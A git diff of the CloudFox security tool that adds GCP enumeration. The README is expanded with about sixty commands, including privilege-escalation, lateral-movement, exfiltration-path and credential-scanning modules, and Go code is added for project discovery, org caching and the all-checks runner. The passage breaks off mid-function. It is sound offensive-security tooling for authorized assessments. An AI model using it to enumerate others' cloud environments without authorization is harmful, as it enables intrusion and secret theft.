diff --git a/.github/workflows/codespell.yml b/.github/workflows/codespell.yml index 75fc0b54..5fdcfe1c 100644 --- a/.github/workflows/codespell.yml +++ b/.github/workflows/codespell.yml @@ -13,4 +13,4 @@ jobs: steps: - uses: actions/checkout@v4 - run: pip install --user codespell - - run: codespell --ignore-words-list="aks" --skip="*.sum" + - run: codespell --ignore-words-list="aks,referers,invokable" --skip="*.sum" diff --git a/.gitignore b/.gitignore index 9dac55a5..cd9cead3 100644 --- a/.gitignore +++ b/.gitignore @@ -62,8 +62,11 @@ terraform.rc .DS_Store untracked/* +*tmp* +tmp/* output/* *cloudfox-output* +cloudfox-* cloudfox *.log *.bak @@ -75,4 +78,4 @@ dist/ # graphvis files *.gv -*.svg \ No newline at end of file +*.svg diff --git a/README.md b/README.md index d9f5fd53..b6070219 100644 --- a/README.md +++ b/README.md @@ -52,9 +52,9 @@ For the full documentation please refer to our [wiki](https://github.com/BishopF | Provider| CloudFox Commands | | - | - | -| AWS | 34 | -| Azure | 4 | -| GCP | 8 | +| AWS | 34 | +| Azure | 4 | +| GCP | 60 | | Kubernetes | Support Planned | @@ -106,7 +106,53 @@ Additional policy notes (as of 09/2022): | `arn:aws:iam::aws:policy/AdministratorAccess` | This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :) | ### Azure -* Viewer or similar permissions applied. +* Viewer or similar permissions applied. + +### GCP +* Google Cloud SDK installed and authenticated +* Application Default Credentials configured (`gcloud auth application-default login`) +* Recommended permissions at appropriate hierarchy levels (see below) + +#### GCP Permissions: Minimal vs Comprehensive + +**Minimal Permissions (Single Project):** + +For basic enumeration of a single project, the `roles/viewer` role provides read access to most resources (includes logging, monitoring, and compute/network viewing). 
+ +**Comprehensive Permissions (Organization-Wide):** + +For thorough security assessments across an entire organization: + +| Scope | Role | Purpose | +| - | - | - | +| **Organization** | `roles/resourcemanager.organizationViewer` | View organization structure and metadata | +| **Organization** | `roles/iam.securityReviewer` | Review IAM policies across the organization | +| **Organization** | `roles/cloudasset.viewer` | Query Cloud Asset Inventory for all resources | +| **Organization** | `roles/cloudidentity.groupsViewer` | Enumerate Google Groups and memberships | +| **Folder** | `roles/resourcemanager.folderViewer` | View folder hierarchy and metadata | +| **Project** | `roles/viewer` | Read access to most project resources (includes logging.viewer, monitoring.viewer, compute.viewer) | +| **Tooling Project** | `roles/serviceusage.serviceUsageAdmin` | (Optional) Manage API quotas for CloudFox operations | + +> **Note:** The basic `roles/viewer` role includes permissions from `roles/logging.viewer`, `roles/monitoring.viewer`, and `roles/compute.networkViewer`, so these don't need to be granted separately. + +#### GCP API Requirements + +**APIs must be enabled in each project you want to assess.** GCP APIs are project-scoped. 
+ +| API | Service Name | Purpose | +| - | - | - | +| Cloud Identity API | `cloudidentity.googleapis.com` | Group enumeration, inherited role analysis | +| Cloud Asset API | `cloudasset.googleapis.com` | Cross-project resource discovery | +| Cloud Resource Manager API | `cloudresourcemanager.googleapis.com` | Organization mapping, IAM enumeration | +| IAM API | `iam.googleapis.com` | IAM analysis, privilege escalation detection | +| Compute Engine API | `compute.googleapis.com` | Instance enumeration, network security | +| Secret Manager API | `secretmanager.googleapis.com` | Secrets enumeration | +| Cloud Functions API | `cloudfunctions.googleapis.com` | Serverless enumeration | +| Cloud Run API | `run.googleapis.com` | Serverless enumeration | +| Kubernetes Engine API | `container.googleapis.com` | Container security analysis | +| BigQuery API | `bigquery.googleapis.com` | Data security analysis | + +For detailed setup instructions, see the [GCP Setup Guide](https://github.com/BishopFox/cloudfox/wiki/GCP-Setup-Guide). # AWS Commands | Provider | Command Name | Description @@ -159,22 +205,82 @@ Additional policy notes (as of 09/2022): # GCP Commands -| Provider | Command Name | Description + +For detailed documentation on each GCP command, see the [GCP Commands Wiki](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands). 
+ +| Provider | Command Name | Description | - | - | - | -| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display the email address of the GCP authenticated user | -| GCP | [all-checks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#all-checks) | Runs all available GCP commands | -| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Display GCP artifact registry information | -| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Display Bigquery datasets and tables information | -| GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Display GCP buckets information | -| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Display GCP IAM information | -| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Display GCP Compute Engine instances information | -| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Display GCP secrets information | +| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display identity context for the authenticated GCP user/service account | +| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Enumerate GCP IAM principals across organizations, folders, and projects | +| GCP | [permissions](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#permissions) | Enumerate ALL permissions for each IAM entity with full inheritance explosion | +| GCP | [serviceaccounts](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#serviceaccounts) | Enumerate GCP service accounts with security analysis | +| GCP | [service-agents](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#service-agents) | Enumerate Google-managed service agents | +| GCP | [keys](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#keys) | Enumerate all GCP keys (SA 
keys, HMAC keys, API keys) | +| GCP | [resource-iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#resource-iam) | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) | +| GCP | [domain-wide-delegation](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#domain-wide-delegation) | Find service accounts with Domain-Wide Delegation to Google Workspace | +| GCP | [privesc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#privesc) | Identify privilege escalation paths in GCP projects | +| GCP | [hidden-admins](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#hidden-admins) | Identify principals who can modify IAM policies (hidden admins) | +| GCP | [identity-federation](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#identity-federation) | Enumerate Workload Identity Federation (external identities) | +| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Enumerate GCP Compute Engine instances with security configuration | +| GCP | [gke](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#gke) | Enumerate GKE clusters with security analysis | +| GCP | [cloudrun](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudrun) | Enumerate Cloud Run services and jobs with security analysis | +| GCP | [functions](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#functions) | Enumerate GCP Cloud Functions with security analysis | +| GCP | [app-engine](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#app-engine) | Enumerate App Engine applications and security configurations | +| GCP | [composer](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#composer) | Enumerate Cloud Composer environments | +| GCP | [dataproc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dataproc) | Enumerate Dataproc clusters | +| GCP | [dataflow](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dataflow) | Enumerate Dataflow jobs and pipelines | +| GCP | 
[notebooks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#notebooks) | Enumerate Vertex AI Workbench notebooks | +| GCP | [workload-identity](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#workload-identity) | Enumerate GKE Workload Identity and Workload Identity Federation | +| GCP | [inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#inventory) | Quick resource inventory - works without Cloud Asset API | +| GCP | [storage](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#storage) | Enumerate GCP Cloud Storage buckets with security configuration | +| GCP | [storage-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#storage-enum) | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | +| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Enumerate GCP BigQuery datasets and tables with security analysis | +| GCP | [cloudsql](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudsql) | Enumerate Cloud SQL instances with security analysis | +| GCP | [spanner](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#spanner) | Enumerate Cloud Spanner instances and databases | +| GCP | [bigtable](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigtable) | Enumerate Cloud Bigtable instances and tables | +| GCP | [filestore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#filestore) | Enumerate Filestore NFS instances | +| GCP | [memorystore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#memorystore) | Enumerate Memorystore (Redis) instances | +| GCP | [vpc-networks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-networks) | Enumerate VPC Networks | +| GCP | [firewall](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#firewall) | Enumerate VPC networks and firewall rules with security analysis | +| GCP | [loadbalancers](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#loadbalancers) | Enumerate Load 
Balancers | +| GCP | [dns](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dns) | Enumerate Cloud DNS zones and records with security analysis | +| GCP | [endpoints](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#endpoints) | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | +| GCP | [private-service-connect](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#private-service-connect) | Enumerate Private Service Connect endpoints and service attachments | +| GCP | [network-topology](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#network-topology) | Visualize VPC network topology, peering relationships, and trust boundaries | +| GCP | [vpc-sc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-sc) | Enumerate VPC Service Controls | +| GCP | [access-levels](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#access-levels) | Enumerate Access Context Manager access levels | +| GCP | [cloud-armor](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloud-armor) | Enumerate Cloud Armor security policies and find weaknesses | +| GCP | [iap](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iap) | Enumerate Identity-Aware Proxy configurations | +| GCP | [beyondcorp](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#beyondcorp) | Enumerate BeyondCorp Enterprise configurations | +| GCP | [kms](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#kms) | Enumerate Cloud KMS key rings and crypto keys with security analysis | +| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Enumerate GCP Secret Manager secrets with security configuration | +| GCP | [cert-manager](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cert-manager) | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | +| GCP | [org-policies](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#org-policies) | Enumerate organization policies and 
identify security weaknesses | +| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Enumerate GCP Artifact Registry and Container Registry with security configuration | +| GCP | [cloudbuild](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudbuild) | Enumerate Cloud Build triggers and builds | +| GCP | [source-repos](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#source-repos) | Enumerate Cloud Source Repositories | +| GCP | [scheduler](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#scheduler) | Enumerate Cloud Scheduler jobs with security analysis | +| GCP | [pubsub](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#pubsub) | Enumerate Pub/Sub topics and subscriptions with security analysis | +| GCP | [logging](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging) | Enumerate Cloud Logging sinks and metrics with security analysis | +| GCP | [organizations](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#organizations) | Enumerate GCP organization hierarchy | +| GCP | [asset-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#asset-inventory) | Enumerate Cloud Asset Inventory with optional dependency analysis | +| GCP | [backup-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#backup-inventory) | Enumerate backup policies, protected resources, and identify backup gaps | +| GCP | [lateral-movement](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#lateral-movement) | Map lateral movement paths, credential theft vectors, and pivot opportunities | +| GCP | [data-exfiltration](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#data-exfiltration) | Identify data exfiltration paths, potential vectors, and missing security hardening | +| GCP | [public-access](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#public-access) | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | +| GCP | 
[cross-project](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cross-project) | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | +| GCP | [foxmapper](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#foxmapper) | Run FoxMapper (graph-based IAM analysis) for privilege escalation path discovery | +| GCP | [logging-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging-enum) | Scan Cloud Logging entries for sensitive data (credentials, tokens, PII) | +| GCP | [bigquery-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery-enum) | Scan BigQuery datasets, tables, and columns for sensitive data indicators | +| GCP | [bigtable-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigtable-enum) | Scan Bigtable instances, tables, and column families for sensitive data indicators | +| GCP | [spanner-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#spanner-enum) | Scan Spanner database schemas for sensitive table and column names | # Authors * [Carlos Vendramini](https://github.com/carlosvendramini-bf) * [Seth Art (@sethsec](https://twitter.com/sethsec)) +* Joseph Barcia # Contributing [Wiki - How to Contribute](https://github.com/BishopFox/cloudfox/wiki#how-to-contribute) diff --git a/cli/gcp.go b/cli/gcp.go old mode 100644 new mode 100755 index e69efb6b..ec7e778e --- a/cli/gcp.go +++ b/cli/gcp.go @@ -3,10 +3,14 @@ package cli import ( "context" "fmt" + "strings" + "time" "github.com/BishopFox/cloudfox/gcp/commands" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) @@ -16,12 +20,20 @@ var ( GCPProjectID string GCPProjectIDsFilePath string GCPProjectIDs []string + GCPAllProjects bool + + // Project name mapping (ProjectID -> DisplayName) + 
GCPProjectNames map[string]string // Output formatting options GCPOutputFormat string GCPOutputDirectory string GCPVerbosity int GCPWrapTable bool + GCPFlatOutput bool + + // Refresh cache flag - force re-enumeration even if cache exists + GCPRefreshCache bool // misc options // GCPIgnoreCache bool @@ -36,46 +48,442 @@ var ( Long: `See "Available Commands" for GCP Modules below`, Short: "See \"Available Commands\" for GCP Modules below", PersistentPreRun: func(cmd *cobra.Command, args []string) { + // Reset project IDs and names to avoid accumulation across commands + GCPProjectIDs = nil + GCPProjectNames = make(map[string]string) + + // Handle project discovery based on flags + // Priority: -p (single project) > -l (project list) > -A (all projects) if GCPProjectID != "" { + // Single project specified with -p/--project GCPProjectIDs = append(GCPProjectIDs, GCPProjectID) + resolveProjectNames(GCPProjectIDs) } else if GCPProjectIDsFilePath != "" { - GCPProjectIDs = internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + // Project list specified with -l/--project-list + rawProjectIDs := internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + GCPProjectIDs = deduplicateProjectIDs(rawProjectIDs) + resolveProjectNames(GCPProjectIDs) + } else if GCPAllProjects { + // Discover all accessible projects with -A/--all-projects + GCPLogger.InfoM("Discovering all accessible projects...", "gcp") + orgsSvc := orgsservice.New() + projects, err := orgsSvc.SearchProjects("") + if err != nil { + GCPLogger.FatalM(fmt.Sprintf("Failed to discover projects: %v. Try using -p or -l flags instead.", err), "gcp") + } + for _, proj := range projects { + if proj.State == "ACTIVE" { + GCPProjectIDs = append(GCPProjectIDs, proj.ProjectID) + GCPProjectNames[proj.ProjectID] = proj.DisplayName + } + } + if len(GCPProjectIDs) == 0 { + GCPLogger.FatalM("No accessible projects found. 
Check your permissions.", "gcp") + } + GCPLogger.InfoM(fmt.Sprintf("Discovered %d project(s)", len(GCPProjectIDs)), "gcp") } else { - GCPLogger.InfoM("project or project-list flags not given, commands requiring a project ID will fail", "gcp") + GCPLogger.InfoM("No project scope specified. Use -p, -l, or -A flag.", "gcp") } - // Create a context with this value to share it with subcommands at runtime + + // Create a context with project IDs and names ctx := context.WithValue(context.Background(), "projectIDs", GCPProjectIDs) + ctx = context.WithValue(ctx, "projectNames", GCPProjectNames) - // Set the context for this command which all subcommands can access via [SUBCMD].Parent().Context() - // cmd.SetContext(ctx) + // Authenticate and get account info os := oauthservice.NewOAuthService() principal, err := os.WhoAmI() if err != nil { - GCPLogger.FatalM(fmt.Sprintf("could not determine default user credential with error %s. \n\nPlease use default application default credentials: https://cloud.google.com/docs/authentication/application-default-credentials", err.Error()), "gcp") + GCPLogger.FatalM(fmt.Sprintf("could not determine default user credential with error %s.\n\nPlease use default application default credentials: https://cloud.google.com/docs/authentication/application-default-credentials\n\nTry: gcloud auth application-default login", err.Error()), "gcp") } ctx = context.WithValue(ctx, "account", principal.Email) + + // Build scope hierarchy for hierarchical output (unless --flat-output is set) + if !GCPFlatOutput && len(GCPProjectIDs) > 0 { + GCPLogger.InfoM("Building scope hierarchy for hierarchical output...", "gcp") + orgsSvc := orgsservice.New() + provider := orgsservice.NewHierarchyProvider(orgsSvc) + hierarchy, err := gcpinternal.BuildScopeHierarchy(GCPProjectIDs, provider) + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not build hierarchy, using flat output: %v", err), "gcp") + } else { + ctx = context.WithValue(ctx, "hierarchy", hierarchy) + 
// Log hierarchy summary + if len(hierarchy.Organizations) > 0 { + GCPLogger.InfoM(fmt.Sprintf("Detected %d organization(s), %d project(s)", len(hierarchy.Organizations), len(hierarchy.Projects)), "gcp") + } else { + GCPLogger.InfoM(fmt.Sprintf("Detected %d standalone project(s)", len(hierarchy.StandaloneProjs)), "gcp") + } + } + } + + // Get account for cache operations + account, _ := ctx.Value("account").(string) + + // Always try to load FoxMapper data for attack path analysis + // This allows individual modules to show the Attack Paths column + if len(GCPProjectIDs) > 0 { + // Get org ID from hierarchy if available (GCPOrganization flag may be empty) + orgID := GCPOrganization + if orgID == "" { + if hierarchy, ok := ctx.Value("hierarchy").(*gcpinternal.ScopeHierarchy); ok && hierarchy != nil { + if len(hierarchy.Organizations) > 0 { + orgID = hierarchy.Organizations[0].ID + } + } + } + + foxMapperCache := gcpinternal.TryLoadFoxMapper(orgID, GCPProjectIDs) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + ctx = gcpinternal.SetFoxMapperCacheInContext(ctx, foxMapperCache) + totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() + ageDays := foxMapperCache.GetDataAgeDays() + + if ageDays >= 30 { + GCPLogger.WarnM(fmt.Sprintf("FoxMapper data is %d days old - consider running 'foxmapper gcp graph create' to refresh", + ageDays), "gcp") + } else { + GCPLogger.InfoM(fmt.Sprintf("FoxMapper data is %d days old", ageDays), "gcp") + } + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc", + totalNodes, adminNodes, nodesWithPrivesc), "gcp") + } + } + + // Always try to load org cache for cross-project analysis + // Cache auto-refreshes after 24 hours + // Force refresh when running the organizations command to ensure fresh data + refreshCache := GCPRefreshCache || cmd.Name() == "organizations" + orgCache := loadOrPopulateOrgCache(account, refreshCache) + if orgCache != nil && orgCache.IsPopulated() 
{ + ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) + } + cmd.SetContext(ctx) }, } ) +// deduplicateProjectIDs removes duplicates, trims whitespace, and filters empty entries +func deduplicateProjectIDs(projectIDs []string) []string { + seen := make(map[string]bool) + var result []string + duplicateCount := 0 + + for _, id := range projectIDs { + // Trim whitespace + id = strings.TrimSpace(id) + + // Skip empty lines + if id == "" { + continue + } + + // Skip duplicates + if seen[id] { + duplicateCount++ + continue + } + + seen[id] = true + result = append(result, id) + } + + if duplicateCount > 0 { + GCPLogger.InfoM(fmt.Sprintf("Removed %d duplicate project ID(s) from list", duplicateCount), "gcp") + } + + return result +} + +// resolveProjectNames fetches display names for given project IDs +func resolveProjectNames(projectIDs []string) { + if len(projectIDs) == 0 { + return + } + + orgsSvc := orgsservice.New() + // Fetch all accessible projects and build lookup map + projects, err := orgsSvc.SearchProjects("") + if err != nil { + // Non-fatal: we can continue without display names + GCPLogger.InfoM("Could not resolve project names, using project IDs only", "gcp") + for _, id := range projectIDs { + GCPProjectNames[id] = id // fallback to using ID as name + } + return + } + + // Build lookup from fetched projects + projectLookup := make(map[string]string) + for _, proj := range projects { + projectLookup[proj.ProjectID] = proj.DisplayName + } + + // Map our project IDs to names + for _, id := range projectIDs { + if name, ok := projectLookup[id]; ok { + GCPProjectNames[id] = name + } else { + GCPProjectNames[id] = id // fallback to using ID as name + } + } +} + // New RunAllGCPCommands function to execute all child commands var GCPAllChecksCommand = &cobra.Command{ Use: "all-checks", Short: "Runs all available GCP commands", Long: `Executes all available GCP commands to collect and display information from all supported GCP services.`, Run: func(cmd 
*cobra.Command, args []string) { + var executedModules []string + startTime := time.Now() + ctx := cmd.Context() + account, _ := ctx.Value("account").(string) + + // Set all-checks mode - individual modules will skip saving cache + // (we'll save consolidated cache at the end) + ctx = gcpinternal.SetAllChecksMode(ctx, true) + cmd.SetContext(ctx) + + // Load or populate org cache for cross-project modules + existingOrgCache := gcpinternal.GetOrgCacheFromContext(ctx) + if existingOrgCache == nil || !existingOrgCache.IsPopulated() { + GCPLogger.InfoM("Loading/enumerating organization data for cross-project analysis...", "all-checks") + orgCache := loadOrPopulateOrgCache(account, GCPRefreshCache) + if orgCache != nil && orgCache.IsPopulated() { + ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) + cmd.SetContext(ctx) + } + } else { + orgs, folders, projects := existingOrgCache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Using existing org cache: %d org(s), %d folder(s), %d project(s)", orgs, folders, projects), "all-checks") + } + + // Find the privesc command to run first + var privescCmd *cobra.Command + for _, childCmd := range GCPCommands.Commands() { + if childCmd.Use == "privesc" { + privescCmd = childCmd + break + } + } + + // Run privesc command first (produces output) and load FoxMapper data for other modules + if privescCmd != nil { + GCPLogger.InfoM("Running privilege escalation analysis first...", "all-checks") + privescCmd.Run(cmd, args) + executedModules = append(executedModules, "privesc") + + // After running privesc, try to load FoxMapper data for other modules + existingFoxMapper := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if existingFoxMapper != nil && existingFoxMapper.IsPopulated() { + totalNodes, adminNodes, nodesWithPrivesc := existingFoxMapper.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Using existing FoxMapper cache: %d principals, %d admins, %d with privesc", totalNodes, adminNodes, nodesWithPrivesc), "all-checks") + } else { + // Get 
org ID from org cache if available (GCPOrganization flag may be empty) + orgID := GCPOrganization + if orgID == "" { + if orgCache := gcpinternal.GetOrgCacheFromContext(ctx); orgCache != nil && len(orgCache.Organizations) > 0 { + orgID = orgCache.Organizations[0].ID + } + } + + // Try to load FoxMapper data + foxMapperCache := gcpinternal.TryLoadFoxMapper(orgID, GCPProjectIDs) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + ctx = gcpinternal.SetFoxMapperCacheInContext(ctx, foxMapperCache) + cmd.SetContext(ctx) + totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc", totalNodes, adminNodes, nodesWithPrivesc), "all-checks") + } else { + GCPLogger.InfoM("No FoxMapper data found. Run 'foxmapper gcp graph create' for attack path analysis.", "all-checks") + } + } + GCPLogger.InfoM("", "all-checks") + } + + // Modules excluded from all-checks (run separately, not part of standard enumeration) + excludeFromAllChecks := map[string]bool{ + "privesc": true, // Already ran above + "storage-enum": true, // Sensitive data enum modules (run separately) + "logging-enum": true, + "bigquery-enum": true, + "bigtable-enum": true, + "spanner-enum": true, + } + + // Count total modules to execute (excluding self, hidden, and excluded modules) + var modulesToRun []*cobra.Command for _, childCmd := range GCPCommands.Commands() { - if childCmd == cmd { // Skip the run-all command itself to avoid infinite recursion + if childCmd == cmd { // Skip the run-all command itself continue } + if childCmd.Hidden { // Skip hidden commands + continue + } + if excludeFromAllChecks[childCmd.Use] { + continue + } + modulesToRun = append(modulesToRun, childCmd) + } + totalModules := len(modulesToRun) + + GCPLogger.InfoM(fmt.Sprintf("Starting execution of %d modules...", totalModules), "all-checks") + GCPLogger.InfoM("", "all-checks") - GCPLogger.InfoM(fmt.Sprintf("Running 
command: %s", childCmd.Use), "all-checks") + for i, childCmd := range modulesToRun { + GCPLogger.InfoM(fmt.Sprintf("[%d/%d] Running: %s", i+1, totalModules, childCmd.Use), "all-checks") childCmd.Run(cmd, args) + executedModules = append(executedModules, childCmd.Use) } + + // Print summary + duration := time.Since(startTime) + printExecutionSummary(executedModules, duration) }, } +// loadOrPopulateOrgCache loads org cache from disk if available, or enumerates and saves it +func loadOrPopulateOrgCache(account string, forceRefresh bool) *gcpinternal.OrgCache { + // Check if cache exists and we're not forcing refresh + if !forceRefresh && gcpinternal.OrgCacheExists(GCPOutputDirectory, account) { + // Check if cache is stale (older than 24 hours) + if gcpinternal.IsCacheStale(GCPOutputDirectory, account, "org", gcpinternal.DefaultCacheExpiration) { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "org") + GCPLogger.InfoM(fmt.Sprintf("Org cache is stale (age: %s > 24h), refreshing...", formatDuration(age)), "gcp") + } else { + cache, metadata, err := gcpinternal.LoadOrgCacheFromFile(GCPOutputDirectory, account) + if err == nil && cache != nil { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "org") + GCPLogger.InfoM(fmt.Sprintf("Loaded org cache from disk (age: %s, %d projects)", + formatDuration(age), metadata.TotalProjects), "gcp") + return cache + } + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not load org cache: %v, re-enumerating...", err), "gcp") + // Delete corrupted cache file + gcpinternal.DeleteCache(GCPOutputDirectory, account, "org") + } + } + } + + // Enumerate and create cache + cache := enumerateAndCacheOrgs(account) + return cache +} + +// enumerateAndCacheOrgs enumerates all orgs/folders/projects and saves to disk +func enumerateAndCacheOrgs(account string) *gcpinternal.OrgCache { + cache := gcpinternal.NewOrgCache() + + orgsSvc := orgsservice.New() + + // Get all organizations + orgs, err := 
orgsSvc.SearchOrganizations() + if err == nil { + for _, org := range orgs { + cache.AddOrganization(gcpinternal.CachedOrganization{ + ID: org.Name[len("organizations/"):], // Strip prefix + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + } + + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err == nil { + for _, folder := range folders { + cache.AddFolder(gcpinternal.CachedFolder{ + ID: folder.Name[len("folders/"):], // Strip prefix + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + } + + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err == nil { + for _, project := range projects { + // Extract project number from Name (format: "projects/123456789") + projectNumber := "" + if strings.HasPrefix(project.Name, "projects/") { + projectNumber = strings.TrimPrefix(project.Name, "projects/") + } + cache.AddProject(gcpinternal.CachedProject{ + ID: project.ProjectID, + Number: projectNumber, + Name: project.Name, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } + + cache.MarkPopulated() + + // Save to disk + err = gcpinternal.SaveOrgCacheToFile(cache, GCPOutputDirectory, account, "2.0.0") + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not save org cache to disk: %v", err), "gcp") + } else { + cacheDir := gcpinternal.GetCacheDirectory(GCPOutputDirectory, account) + GCPLogger.InfoM(fmt.Sprintf("Org cache saved to %s", cacheDir), "gcp") + } + + orgsCount, foldersCount, projectsCount := cache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Organization cache populated: %d org(s), %d folder(s), %d project(s)", + orgsCount, foldersCount, projectsCount), "gcp") + + return cache +} + +// printExecutionSummary prints a summary of all executed modules +func printExecutionSummary(modules []string, duration time.Duration) { + GCPLogger.InfoM("", "all-checks") // 
